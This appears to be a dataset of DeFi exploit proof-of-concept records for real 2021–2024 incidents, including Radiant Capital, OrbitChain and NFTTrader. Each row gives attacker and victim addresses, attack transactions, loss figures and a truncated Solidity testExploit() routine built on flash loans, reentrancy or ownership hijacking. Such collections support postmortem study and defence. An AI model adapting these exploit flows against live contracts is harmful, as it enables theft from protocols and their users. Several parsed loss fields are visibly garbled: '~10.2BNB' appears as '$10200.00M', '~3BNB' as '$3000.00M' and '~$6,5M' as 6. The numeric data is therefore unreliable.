// Vulnerable Contract : https://bscscan.... | exploit_poc | Freedom | 2024-01 | Freedom_exp.sol | flash_loan | f9448adf9cb9af3b | 2026-01-07T10:59:16.529338 | postmortems | bsc | 35,123,711 | ~74 $WBNB | 74 | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0x4512abb79f1f80830f4641caefc5ab33654a2d49 | https://bscscan.com/address/0xae3ada8787245977832c6dab2d4474d3943527ab | https://bscscan.com/tx/0x309523343cc1bb9d28b960ebf83175fac941b4a590830caccff44263d9a80ff0 | null | null | true | false | true | low | ~74 $WBNB | flash-loan | function testExploit() public {
emit log_named_uint("Attacker WBNB balance before attack:", WBNB.balanceOf(address(this)));
WBNB.approve(address(Router), type(uint256).max);
DODO.flashLoan(500 * 1e18, 0, address(this), new bytes(1));
emit log_named_uint("Attacker WBNB balance before atta... | true | ~74 $WBNB | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0x4512abb79f1f80830f4641caefc5ab33654a2d49 | https://bscscan.com/address/0xae3ada8787245977832c6dab2d4474d3943527ab | https://bscscan.com/tx/0x309523343cc1bb9d28b960ebf83175fac941b4a590830caccff44263d9a80ff0 | $74 | 8.7 | high | Freedom Exploit (2024-01) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
@KeyInfo
- Total Lost: 114,000 USDC
- Attacker: https://etherscan.io/address/0x63136677355840f26c0695dd6de5c9e4f514f8e8
- Attack Contract: https://etherscan.io/address/0xae59191... | exploit_poc | Bmizapper | 2024-01 | Bmizapper_exp.sol | null | a950bb4b747fa5cb | 2026-01-07T10:59:16.529386 | postmortems | ethereum | 19,029,290 | 114,000 USDC | 114 | https://etherscan.io/address/0x63136677355840f26c0695dd6de5c9e4f514f8e8 | https://etherscan.io/address/0xae5919160a646f5d80d89f7aae35a2ca74738440 | null | https://app.blocksec.com/explorer/tx/eth/0x97201900198d0054a2f7a914f5625591feb6a18e7fc6bb4f0c964b967a6c15f6 | null | null | true | false | false | low | 114,000 USDC | unknown | false | 114,000 USDC | https://etherscan.io/address/0x63136677355840f26c0695dd6de5c9e4f514f8e8 | https://etherscan.io/address/0xae5919160a646f5d80d89f7aae35a2ca74738440 | https://app.blocksec.com/explorer/tx/eth/0x97201900198d0054a2f7a914f5625591feb6a18e7fc6bb4f0c964b967a6c15f6 | $114 | 4.55 | low | Bmizapper Exploit (2024-01) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~1000 $BUSD
// Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
// Attack Contract : https://bscscan.com/address/0xd66a43d0a3e853b98d14268e240cf973e3fa986e
// Vulnerable Contract : https://bscsca... | exploit_poc | Shell_MEV_0xa898 | 2024-01 | Shell_MEV_0xa898_exp.sol | null | edc2d9f5d9927074 | 2026-01-07T10:59:16.529434 | postmortems | bsc | 35,273,751 | ~1000 $BUSD | 1,000 | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0xd66a43d0a3e853b98d14268e240cf973e3fa986e | https://bscscan.com/address/0xa898b78b7cbbabacf9d179c4c46c212c0ac66f46 | https://bscscan.com/tx/0x24f114c0ef65d39e0988d164e052ce8052fe4a4fd303399a8c1bb855e8da01e9 | null | null | true | false | false | low | ~1000 $BUSD | unknown | function testExploit() public {
BUSD.transfer(address(0x000000000000000000000000000000000000dEaD), BUSD.balanceOf(address(this)));
emit log_named_uint("Attacker BUSD balance before attack", BUSD.balanceOf(address(this)));
SHELL.approve(address(Router), type(uint256).max);
while (BUSD.bal... | true | ~1000 $BUSD | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0xd66a43d0a3e853b98d14268e240cf973e3fa986e | https://bscscan.com/address/0xa898b78b7cbbabacf9d179c4c46c212c0ac66f46 | https://bscscan.com/tx/0x24f114c0ef65d39e0988d164e052ce8052fe4a4fd303399a8c1bb855e8da01e9 | $1.0K | 7.43 | medium | Shell_MEV_0xa898 Exploit (2024-01) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$93K
// Attacker : https://arbiscan.io/address/0xfcf88e5e1314ca3b6be7eed851568834233f8b49
// Attack Contract : https://arbiscan.io/address/0xfcbf411237ac830dc892edec054... | exploit_poc | CitadelFinance | 2024-01 | CitadelFinance_exp.sol | flash_loan | e62991399439fa99 | 2026-01-07T10:59:16.529481 | postmortems | arbitrum | 174,659,183 | ~$93K | 93,000 | https://arbiscan.io/address/0xfcf88e5e1314ca3b6be7eed851568834233f8b49 | https://arbiscan.io/address/0xfcbf411237ac830dc892edec054f15ba7f9ea5a6 | null | null | null | null | true | true | true | medium | ~$93K | flash-loan | function testExploit() public {
// Before attack
// Deposit CIT tx: https://app.blocksec.com/explorer/tx/arbitrum/0xcf75802229d440e4fbabb4d357fa1886c25e9a6b5c693e9e9573c71c15e2b0d3
// Exploiter transfer to attack contract following amount of CIT:
deal(address(CIT), address(this), 2653 * ... | true | ~$93K | https://arbiscan.io/address/0xfcf88e5e1314ca3b6be7eed851568834233f8b49 | https://arbiscan.io/address/0xfcbf411237ac830dc892edec054f15ba7f9ea5a6 | $93.0K | 8 | high | CitadelFinance Exploit (2024-01) | true | false | false | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$6,5M
// Attacker : https://etherscan.io/address/0x87f585809ce79ae39a5fa0c7c96d0d159eb678c9
// Attack Contract : https://etherscan.io/address/0x193e045bee45c7573ff89b12... | exploit_poc | MIMSpell2 | 2024-01 | MIMSpell2_exp.sol | flash_loan | 7338c7109ba3424e | 2026-01-07T10:59:16.529547 | postmortems | ethereum | 19,118,659 | ~$6,5M | 6 | https://etherscan.io/address/0x87f585809ce79ae39a5fa0c7c96d0d159eb678c9 | https://etherscan.io/address/0x193e045bee45c7573ff89b12601c745af739ce67 | null | https://app.blocksec.com/explorer/tx/eth/0x26a83db7e28838dd9fee6fb7314ae58dcc6aee9a20bf224c386ff5e80f7e4cf2 | null | null | true | true | true | low | ~$6,5M | flash-loan | function testExploit() public {
emit log_named_decimal_uint("Exploiter MIM balance before attack", MIM.balanceOf(address(this)), MIM.decimals());
emit log_named_decimal_uint(
"Exploiter WETH balance before attack", WETH.balanceOf(address(this)), WETH.decimals()
);
MIM.appro... | true | ~$6,5M | https://etherscan.io/address/0x87f585809ce79ae39a5fa0c7c96d0d159eb678c9 | https://etherscan.io/address/0x193e045bee45c7573ff89b12601c745af739ce67 | https://app.blocksec.com/explorer/tx/eth/0x26a83db7e28838dd9fee6fb7314ae58dcc6aee9a20bf224c386ff5e80f7e4cf2 | $6 | 9 | high | MIMSpell2 Exploit (2024-01) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$500K
// Attacker : https://bscscan.com/address/0x1703062d657c1ca439023f0993d870f4707a37ff
// Attack Contract : https://bscscan.com/address/0xafebc0a9e26fea567cc9e6dd75... | exploit_poc | MIC | 2024-01 | MIC_exp.sol | flash_loan | c5c835ff83e02404 | 2026-01-07T10:59:16.529620 | postmortems | bsc | null | ~$500K | 500,000 | https://bscscan.com/address/0x1703062d657c1ca439023f0993d870f4707a37ff | https://bscscan.com/address/0xafebc0a9e26fea567cc9e6dd7504800c67f4e3fe | https://bscscan.com/address/0xb38c2d2d6a168d41aa8eb4cead47e01badbdcf57 | https://app.blocksec.com/explorer/tx/bsc/0x316c35d483b72700e6f4984650d217304146b3732bb148e32fa7f8017843eb24 | null | https://x.com/MetaSec_xyz/status/1742484748239536173 | true | true | true | high | ~$500K | flash-loan | function testExploit() public {
deal(address(BUSDT), address(this), 0);
deal(address(this), 0);
emit log_named_decimal_uint(
"Exploiter BUSDT balance before attack", BUSDT.balanceOf(address(this)), BUSDT.decimals()
);
// Flashloan 1700 BUSDT tokens
BUSDT_USDC... | true | ~$500K | https://bscscan.com/address/0x1703062d657c1ca439023f0993d870f4707a37ff | https://bscscan.com/address/0xafebc0a9e26fea567cc9e6dd7504800c67f4e3fe | https://bscscan.com/address/0xb38c2d2d6a168d41aa8eb4cead47e01badbdcf57 | https://app.blocksec.com/explorer/tx/bsc/0x316c35d483b72700e6f4984650d217304146b3732bb148e32fa7f8017843eb24 | https://x.com/MetaSec_xyz/status/1742484748239536173 | $500.0K | 10 | high | MIC Exploit (2024-01) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$4,5M
// Attacker : https://arbiscan.io/address/0x826d5f4d8084980366f975e10db6c4cf1f9dde6d
// Attack Contract : https://arbiscan.io/address/0x39519c027b503f40867548fb0c... | exploit_poc | RadiantCapital | 2024-01 | RadiantCapital_exp.sol | flash_loan | e5a9eb4e86797fa8 | 2026-01-07T10:59:16.529688 | postmortems | arbitrum | 166,405,686 | ~$4,5M | 4 | https://arbiscan.io/address/0x826d5f4d8084980366f975e10db6c4cf1f9dde6d | https://arbiscan.io/address/0x39519c027b503f40867548fb0c890b11728faa8f | null | https://explorer.phalcon.xyz/tx/arbitrum/0x1ce7e9a9e3b6dd3293c9067221ac3260858ce119ecb7ca860eac28b2474c7c9b | null | null | true | true | true | low | ~$4,5M | flash-loan | function testExploit() public {
emit log_named_decimal_uint("Exploiter WETH balance before attack", WETH.balanceOf(address(this)), 18);
operationId = 1;
bytes memory params = abi.encode(
address(RadiantLendingPool), address(rUSDCn), address(rWETH), address(WETH_USDC), uint256(1), uin... | true | ~$4,5M | https://arbiscan.io/address/0x826d5f4d8084980366f975e10db6c4cf1f9dde6d | https://arbiscan.io/address/0x39519c027b503f40867548fb0c890b11728faa8f | https://explorer.phalcon.xyz/tx/arbitrum/0x1ce7e9a9e3b6dd3293c9067221ac3260858ce119ecb7ca860eac28b2474c7c9b | $4 | 9 | high | RadiantCapital Exploit (2024-01) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~81M
// Attacker : https://etherscan.io/address/0x9263e7873613ddc598a701709875634819176aff
// Vulnerable Contract : https://etherscan.io/address/0x1bf68a9d1eaee7826b3593... | exploit_poc | OrbitChain | 2024-01 | OrbitChain_exp.sol | null | 0ffd4b7015733f7f | 2026-01-07T10:59:16.529759 | postmortems | ethereum | 18,908,049 | ~81M | 81,000,000 | https://etherscan.io/address/0x9263e7873613ddc598a701709875634819176aff | null | https://etherscan.io/address/0x1bf68a9d1eaee7826b3593c20a0ca93293cb489a | null | null | null | true | true | false | critical | ~81M | unknown | function testExploit() public {
deal(address(WBTC), orbitExploiterToAddr, 0);
emit log_named_decimal_uint(
"Exploiter WBTC balance before attack", WBTC.balanceOf(orbitExploiterToAddr), WBTC.decimals()
);
// At first exploiter has deposited some WBTC tokens (acquired from Unis... | true | ~81M | https://etherscan.io/address/0x9263e7873613ddc598a701709875634819176aff | https://etherscan.io/address/0x1bf68a9d1eaee7826b3593c20a0ca93293cb489a | $81.00M | 7.45 | medium | OrbitChain Exploit (2024-01) | true | true | false | false | ||||
// SPDX-License-Identifier: MIT
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "forge-std/console.sol";
/*Key Information
The Levyathan developers left the private keys to a wallet with minting capability available on Github. -rekt
Attacker Address : 0x7507f84610f6d656a70eb8cdec04467... | exploit_poc | Levyathan | 2021-07 | Levyathan_exp.sol | null | d639d357c57d955d | 2026-01-07T10:59:16.529823 | postmortems | bsc | 9,545,966 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function test_Timelock() public {
bytes memory Ownership_hijack =
(abi.encodePacked(bytes4(keccak256(bytes("transferOwnership(address)"))), abi.encode(address(attacker))));
//Schedule a transaction from the Deployer current owner of timelock.
vm.startPrank(address(Deployer));
... | true | Unknown | 4.7 | low | Levyathan Exploit (2021-07) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~1,6M
// Attacker : https://etherscan.io/address/0x4d0d746e0f66bf825418e6b3def1a46ec3c0b847
// Attack Contract : https://etherscan.io/address/0x7e5433f02f4bf07c4f2a2d341... | exploit_poc | FloorProtocol | 2023-12 | FloorProtocol_exp.sol | null | 24629e4e6ef66753 | 2026-01-07T10:59:16.529883 | postmortems | ethereum | 18,802,287 | ~1,6M | 1 | https://etherscan.io/address/0x4d0d746e0f66bf825418e6b3def1a46ec3c0b847 | https://etherscan.io/address/0x7e5433f02f4bf07c4f2a2d341c450e07d7531428 | https://etherscan.io/address/0xc538d17a6aacc5271be5f51b891e2e92c8187edd | https://explorer.phalcon.xyz/tx/eth/0xec8f6d8e114caf8425736e0a3d5be2f93bbea6c01a50a7eeb3d61d2634927b40 | null | null | true | true | false | low | ~1,6M | unknown | function testExploit() public {
emit log_named_uint("Victim PPG token balance before attack", PPG.balanceOf(victim));
emit log_named_uint("Attacker PPG token balance before attack", PPG.balanceOf(address(this)));
IERC1967Proxy.CallData[] memory calls = new IERC1967Proxy.CallData[](PPG.balanceOf... | true | ~1,6M | https://etherscan.io/address/0x4d0d746e0f66bf825418e6b3def1a46ec3c0b847 | https://etherscan.io/address/0x7e5433f02f4bf07c4f2a2d341c450e07d7531428 | https://etherscan.io/address/0xc538d17a6aacc5271be5f51b891e2e92c8187edd | https://explorer.phalcon.xyz/tx/eth/0xec8f6d8e114caf8425736e0a3d5be2f93bbea6c01a50a7eeb3d61d2634927b40 | $1 | 7.58 | medium | FloorProtocol Exploit (2023-12) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~165K USD$
// Attacker : https://bscscan.com/address/0xbbcc139933d1580e7c40442e09263e90e6f1d66d
// Attack Contract : https://bscscan.com/address/0x69bd13f775505989883768... | exploit_poc | ElephantStatus | 2023-12 | ElephantStatus_exp.sol | null | e37fa1714a692c4b | 2026-01-07T10:59:16.529937 | postmortems | bsc | 34,114,760 | ~165K USD$ | 165,000 | https://bscscan.com/address/0xbbcc139933d1580e7c40442e09263e90e6f1d66d | https://bscscan.com/address/0x69bd13f775505989883768ebd23d528c708d6bcf | https://bscscan.com/address/0x8cf0a553ab3896e4832ebcc519a7a60828ab5740 | https://explorer.phalcon.xyz/tx/bsc/0xd423ae0e95e9d6c8a89dcfed243573867e4aad29ee99a9055728cbbe0a523439 | null | null | true | true | false | high | ~165K USD$ | unknown | function testExploit() public {
emit log_named_decimal_uint(
"Exploiter BUSD balance before attack", BUSD.balanceOf(address(this)), BUSD.decimals()
);
USDC_BUSD.flash(
address(this),
0,
BUSD.balanceOf(address(USDC_BUSD)),
abi.encode(ui... | true | ~165K USD$ | https://bscscan.com/address/0xbbcc139933d1580e7c40442e09263e90e6f1d66d | https://bscscan.com/address/0x69bd13f775505989883768ebd23d528c708d6bcf | https://bscscan.com/address/0x8cf0a553ab3896e4832ebcc519a7a60828ab5740 | https://explorer.phalcon.xyz/tx/bsc/0xd423ae0e95e9d6c8a89dcfed243573867e4aad29ee99a9055728cbbe0a523439 | $165.0K | 8.25 | high | ElephantStatus Exploit (2023-12) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : ~$4.4K
// Attacker : https://bscscan.com/address/0xd227dc77561b58c5a2d2644ac0173152a1a5dc3d
// Attack Contract : https://bscscan.com/address/0xa47b9f87173eda364c821234158dda47b03ac217
// Vulnerable Con... | exploit_poc | Channels | 2023-12 | Channels_exp.sol | null | 3f65e82d48d1e027 | 2026-01-07T10:59:16.529998 | postmortems | bsc | 34,847,596 | ~$4.4K | 4,400 | https://bscscan.com/address/0xd227dc77561b58c5a2d2644ac0173152a1a5dc3d | https://bscscan.com/address/0xa47b9f87173eda364c821234158dda47b03ac217 | https://bscscan.com/address/0xca797539f004c0f9c206678338f820ac38466d4b, | https://bscscan.com/tx/0xcf729a9392b0960cd315d7d49f53640f000ca6b8a0bd91866af5821fdf36afc5 | https://app.blocksec.com/explorer/tx/bsc/0xcf729a9392b0960cd315d7d49f53640f000ca6b8a0bd91866af5821fdf36afc5 | null | true | true | false | low | ~$4.4K | unknown | false | ~$4.4K | https://bscscan.com/address/0xd227dc77561b58c5a2d2644ac0173152a1a5dc3d | https://bscscan.com/address/0xa47b9f87173eda364c821234158dda47b03ac217 | https://bscscan.com/address/0xca797539f004c0f9c206678338f820ac38466d4b, | https://bscscan.com/tx/0xcf729a9392b0960cd315d7d49f53640f000ca6b8a0bd91866af5821fdf36afc5 | https://app.blocksec.com/explorer/tx/bsc/0xcf729a9392b0960cd315d7d49f53640f000ca6b8a0bd91866af5821fdf36afc5 | $4.4K | 7 | medium | Channels Exploit (2023-12) | true | true | true | true | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~5 $WBNB
// Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
// Attack Contract : https://bscscan.com/address/0xaed80b8a821607981e5e58b7a753a3336c0bfd6f
// Vulnerable Contract : https://bscscan.c... | exploit_poc | DominoTT | 2023-12 | DominoTT_exp.sol | flash_loan | 893c6e0561993fbb | 2026-01-07T10:59:16.530055 | postmortems | bsc | 34,141,660 | ~5 $WBNB | 5 | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0xaed80b8a821607981e5e58b7a753a3336c0bfd6f | https://bscscan.com/address/0x0dabdc92af35615443412a336344c591faed3f90 | https://app.blocksec.com/explorer/tx/bsc/0x1ee617cd739b1afcc673a180e60b9a32ad3ba856226a68e8748d58fcccc877a8 | null | null | true | false | true | low | ~5 $WBNB | flash-loan | function testExploit() public {
emit log_named_uint("Attacker WBNB balance before attack", WBNB.balanceOf(address(this)));
DominoTT.approve(address(Router), type(uint256).max);
WBNB.approve(address(Router), type(uint256).max);
DODO.flashLoan(0.5 * 1e18, 0, address(this), new bytes(1));
... | true | ~5 $WBNB | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0xaed80b8a821607981e5e58b7a753a3336c0bfd6f | https://bscscan.com/address/0x0dabdc92af35615443412a336344c591faed3f90 | https://app.blocksec.com/explorer/tx/bsc/0x1ee617cd739b1afcc673a180e60b9a32ad3ba856226a68e8748d58fcccc877a8 | $5 | 9.41 | high | DominoTT Exploit (2023-12) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : ~10.2BNB
// Attacker : https://bscscan.com/address/0x9c66b0c68c144ffe33e7084fe8ce36ebc44ad21e
// Attack Contract : https://bscscan.com/address/0xe9616ff20ad519bce0e3d61353a37232f0c27a50
// Vulnerable C... | exploit_poc | BCT | 2023-12 | BCT_exp.sol | null | 71d7daf523c81a34 | 2026-01-07T10:59:16.530128 | postmortems | bsc | 34,204,710 | ~10.2BNB | 10,200,000,000 | https://bscscan.com/address/0x9c66b0c68c144ffe33e7084fe8ce36ebc44ad21e | https://bscscan.com/address/0xe9616ff20ad519bce0e3d61353a37232f0c27a50 | https://bscscan.com/address/0x88b3eb62e363d9f153beab49c5c2ef2e785a375a | https://bscscan.com/tx/0xdae0b85e01670e6b6b317657a72fb560fc388664cf8bfdd9e1b0ae88e0679103 | null | null | true | true | false | critical | ~10.2BNB | unknown | function testExploit() public {
uint256 before = Wbnb.balanceOf(address(this));
init(); // simulate the first tx for preparation
// attack begin
PancakePair.swap(20_000_000_000_000_000_000, 0, address(this), abi.encode("0x20"));
emit log_named_decimal_uint(
"[End] Aft... | true | ~10.2BNB | https://bscscan.com/address/0x9c66b0c68c144ffe33e7084fe8ce36ebc44ad21e | https://bscscan.com/address/0xe9616ff20ad519bce0e3d61353a37232f0c27a50 | https://bscscan.com/address/0x88b3eb62e363d9f153beab49c5c2ef2e785a375a | https://bscscan.com/tx/0xdae0b85e01670e6b6b317657a72fb560fc388664cf8bfdd9e1b0ae88e0679103 | $10200.00M | 9 | high | BCT Exploit (2023-12) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$208K
// Attacker : https://etherscan.io/address/0x5a7c7eb8d13a53d42a15d2b1d1b694ccc5141ea5
// Attack Contract : https://etherscan.io/address/0x03b7bb750a974e0bd3479501... | exploit_poc | bZx | 2023-12 | bZx_exp.sol | flash_loan | 2e9fee8a892fb79b | 2026-01-07T10:59:16.530209 | postmortems | ethereum | null | ~$208K | 208,000 | https://etherscan.io/address/0x5a7c7eb8d13a53d42a15d2b1d1b694ccc5141ea5 | https://etherscan.io/address/0x03b7bb750a974e0bd34795013f66b669f4110e54 | https://etherscan.io/address/0x7f3fe9d492a9a60aebb06d82cba23c6f32cad10b | null | null | https://x.com/MetaSec_xyz/status/1730811240942088263 | true | true | true | high | ~$208K | flash-loan | function testExploit() public {
// In this POC I demonstrate first attack tx
deal(address(this), 0);
emit log_named_decimal_uint("Exploiter WETH balance before attack", WETH.balanceOf(address(this)), 18);
uint256 yfiFlashAmount = YFI.balanceOf(address(YFI_WETH)) / 10;
// If the d... | true | ~$208K | https://etherscan.io/address/0x5a7c7eb8d13a53d42a15d2b1d1b694ccc5141ea5 | https://etherscan.io/address/0x03b7bb750a974e0bd34795013f66b669f4110e54 | https://etherscan.io/address/0x7f3fe9d492a9a60aebb06d82cba23c6f32cad10b | https://x.com/MetaSec_xyz/status/1730811240942088263 | $208.0K | 9 | high | bZx Exploit (2023-12) | true | true | false | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~84.59 ETH
// Attacker : https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a
// Attack Contract : https://etherscan.io/address/0x6980a47bee930a4584b0... | exploit_poc | TIME | 2023-12 | TIME_exp.sol | null | 0dae8f6658c623d7 | 2026-01-07T10:59:16.530282 | postmortems | ethereum | 18,730,462 | ~84.59 ETH | 84.59 | https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a | https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0 | https://etherscan.io/address/0x4b0e9a7da8bab813efae92a6651019b8bd6c0a29 | https://explorer.phalcon.xyz/tx/eth/0xecdd111a60debfadc6533de30fb7f55dc5ceed01dfadd30e4a7ebdb416d2f6b6 | null | null | true | true | false | low | ~84.59 ETH | unknown | function testExploit() public {
deal(address(this), 5 ether);
emit log_named_decimal_uint("Exploiter ETH balance before attack", address(this).balance, 18);
TIME.approve(address(Router), type(uint256).max);
WETH.approve(address(Router), type(uint256).max);
WETH.deposit{value: 5 e... | true | ~84.59 ETH | https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a | https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0 | https://etherscan.io/address/0x4b0e9a7da8bab813efae92a6651019b8bd6c0a29 | https://explorer.phalcon.xyz/tx/eth/0xecdd111a60debfadc6533de30fb7f55dc5ceed01dfadd30e4a7ebdb416d2f6b6 | $85 | 8.26 | high | TIME Exploit (2023-12) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : ~3BNB
// Attacker : https://bscscan.com/address/0xcb733f075ae67a83a9c5f38a0864596e338a0106
// Attack Contract : https://bscscan.com/address/0x0fe1983b8972630c866fe77ad873a66ec598b685
// Vulnerable Cont... | exploit_poc | Bob | 2023-12 | Bob_exp.sol | flash_loan | cdfd2cfc70451690 | 2026-01-07T10:59:16.530331 | postmortems | bsc | 34,428,628 | ~3BNB | 3,000,000,000 | https://bscscan.com/address/0xcb733f075ae67a83a9c5f38a0864596e338a0106 | https://bscscan.com/address/0x0fe1983b8972630c866fe77ad873a66ec598b685 | https://bscscan.com/address/0x10ed43c718714eb63d5aa57b78b54704e256024e | https://bscscan.com/tx/0xfb14292a531411f852993e5a3ba4e7eb63ed548220267b9b3f4aacc5572d3a58 | null | null | true | true | true | critical | ~3BNB | flash-loan | function testExploit() public {
// WBNB.approve(address(Router), type(uint256).max);
// HackDao.approve(address(Router), type(uint256).max);
DVM(dodo).flashLoan(100 * 1e18, 0, address(this), "0x00");
emit log_named_decimal_uint("[End] Attacker BNB balance after exploit", WBNB.balanceOf(... | true | ~3BNB | https://bscscan.com/address/0xcb733f075ae67a83a9c5f38a0864596e338a0106 | https://bscscan.com/address/0x0fe1983b8972630c866fe77ad873a66ec598b685 | https://bscscan.com/address/0x10ed43c718714eb63d5aa57b78b54704e256024e | https://bscscan.com/tx/0xfb14292a531411f852993e5a3ba4e7eb63ed548220267b9b3f4aacc5572d3a58 | $3000.00M | 9.32 | high | Bob Exploit (2023-12) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~2 $BNB
// Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
// Vulnerable Contract : https://bscscan.com/address/0x4308d314096878d3bf16c9d8db86101f70bbebf1
// Attack Tx : https://bscscan.com/tx/0... | exploit_poc | PHIL | 2023-12 | PHIL_exp.sol | null | af520fa11d69979a | 2026-01-07T10:59:16.530383 | postmortems | bsc | 34,345,320 | ~2 $BNB | 2 | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | null | https://bscscan.com/address/0x4308d314096878d3bf16c9d8db86101f70bbebf1 | https://bscscan.com/tx/0x20ecd8310a2cc7f7774aa5a045c8a99ad84a8451d6650f24e0911e9f4355b13a | null | null | true | false | false | low | ~2 $BNB | unknown | function testExploit() public {
emit log_named_decimal_uint("Attacker WBNB balance before attack", WBNB.balanceOf(address(this)), 18);
PHIL.simpleToken();
TOKENToWETH();
emit log_named_decimal_uint("Attacker WBNB balance after attack", WBNB.balanceOf(address(this)), 18);
} | true | ~2 $BNB | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0x4308d314096878d3bf16c9d8db86101f70bbebf1 | https://bscscan.com/tx/0x20ecd8310a2cc7f7774aa5a045c8a99ad84a8451d6650f24e0911e9f4355b13a | $2 | 7.03 | medium | PHIL Exploit (2023-12) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~3M (info from hacked.slowmist.io)
// Attacker : https://etherscan.io/address/0xb1edf2a0ba8bc789cbc3dfbe519737cada034d2d
// Attacker Contract : https://etherscan.io/addr... | exploit_poc | NFTTrader | 2023-12 | NFTTrader_exp.sol | reentrancy | 486da90b406f5537 | 2026-01-07T10:59:16.530431 | postmortems | ethereum | 18,799,414 | ~3M (info from hacked.slowmist.io) | 3,000,000 | https://etherscan.io/address/0xb1edf2a0ba8bc789cbc3dfbe519737cada034d2d | null | https://etherscan.io/address/0xc310e760778ecbca4c65b6c559874757a4c4ece0 | https://explorer.phalcon.xyz/tx/eth/0xec7523660f8b66d9e4a5931d97ad8b30acc679c973b20038ba4c15d4336b393d | null | null | true | true | true | critical | ~3M (info from hacked.slowmist.io) | reentrancy | function testExploit() public {
deal(address(this), 0.001 ether);
IUniV3PosNFT.MintParams memory params = IUniV3PosNFT.MintParams({
token0: address(USDC),
token1: address(WETH),
fee: 500,
tickLower: 0,
tickUpper: 100_000,
amount0De... | true | ~3M (info from hacked.slowmist.io) | https://etherscan.io/address/0xb1edf2a0ba8bc789cbc3dfbe519737cada034d2d | https://etherscan.io/address/0xc310e760778ecbca4c65b6c559874757a4c4ece0 | https://explorer.phalcon.xyz/tx/eth/0xec7523660f8b66d9e4a5931d97ad8b30acc679c973b20038ba4c15d4336b393d | $3.00M | 10 | high | NFTTrader Exploit (2023-12) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~200K USD$
// Attacker : https://etherscan.io/address/0x3ea6ba6d3415e4dfd380516c799aafa94e420519
// Attack Contract : https://etherscan.io/address/0xba6fa6e8500cd8eeda8e... | exploit_poc | HYPR | 2023-12 | HYPR_exp.sol | null | 5714b56248913628 | 2026-01-07T10:59:16.530494 | postmortems | ethereum | 18,774,584 | ~200K USD$ | 200,000 | https://etherscan.io/address/0x3ea6ba6d3415e4dfd380516c799aafa94e420519 | https://etherscan.io/address/0xba6fa6e8500cd8eeda8ebb9dfbcc554ff4a3eb77 | https://etherscan.io/address/0x40c31236b228935b0329eff066b1ad96e319595e | https://explorer.phalcon.xyz/tx/eth/0x51ce3d9cfc85c1f6a532b908bb2debb16c7569eb8b76effe614016aac6635f65 | null | null | true | true | false | high | ~200K USD$ | unknown | function testExploit() public {
emit log_named_decimal_uint(
